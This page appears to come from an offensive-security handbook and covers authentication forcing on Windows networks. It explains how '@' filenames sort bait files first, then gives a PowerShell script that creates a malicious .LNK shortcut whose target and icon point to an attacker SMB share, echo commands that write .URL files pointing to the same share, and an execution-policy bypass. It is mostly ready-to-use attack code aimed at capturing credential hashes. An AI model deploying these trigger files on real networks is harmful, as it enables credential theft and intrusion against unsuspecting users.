Authentication Triggers and Forcing Techniques

Some magic behind file naming

Files are sorted by ASCII codes when using (sort by name).

So what?

As we know the ASCII value of the first letter is 65 for letter A but the ASCII value for character @ - you will see it in the examples below - is 64 so it appears before any named file that have only alphabetical characters in its name.

This also works with any character that have a smaller value than 65.

Fact: Numerical character 1 has the lowest ASCII value (49) upon all the usable characters in naming files.

Understanding Authentication Triggers

Poisoning Attack Dependencies

Problem: Poisoning attacks are passive so they wait for natural authentication events that may never occur.

Solution: Active triggering, how? by forcing clients to attempt authentication to attacker-controlled services.

Attack Flow:

Trigger Deployment → Client Interaction → Authentication Attempt → Poisoning Response → Credential Capture

Requirements:

Method to deliver the trigger payload or file like SMB shares, E-mail, and so on.
User interaction like clicking on the file (maybe the user is just curious) or just the file appearing to a user in Windows file explorer.

Malicious .LNK & .URL Files

For PowerShell scripts, you must enable the execution policy so that the script can create the file.

powershell -ep bypass

Malicious .LNK Files (Windows Shortcuts)

# This only requires the user seeing it
$AttackerPath = '\\\\<attacker-ip>\\share\\'
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut('@Important Document.lnk')
$Shortcut.TargetPath = "$AttackerPath\\attack.exe"
$Shortcut.IconLocation = "$AttackerPath\\icon.ico"
$Shortcut.Save()

Malicious .URL Files (Internet Shortcuts)

Sometimes the icon method fails because Windows may fall back to a default icon, preventing the authentication trigger.

# Method 1
echo "[InternetShortcut]
URL=Anything
WorkingDirectory=Anything
IconFile=\\<attacker-ip>\share\icon.ico
IconIndex=1" > '@malicious.url'

# Method 2
# Sometimes this requires user interaction
echo "[InternetShortcut]
URL=file://<attacker-ip>/intranet/portal
WorkingDirectory=Anything " > '@malicious.url'

PreviousPoisoning Attacks NextLateral Movement

Last updated 8 months ago

Was this helpful?

Good evening

hashtagSome magic behind file naming

hashtagUnderstanding Authentication Triggers

hashtagPoisoning Attack Dependencies

hashtagMalicious .LNK & .URL Files

hashtagMalicious .LNK Files (Windows Shortcuts)

hashtagMalicious .URL Files (Internet Shortcuts)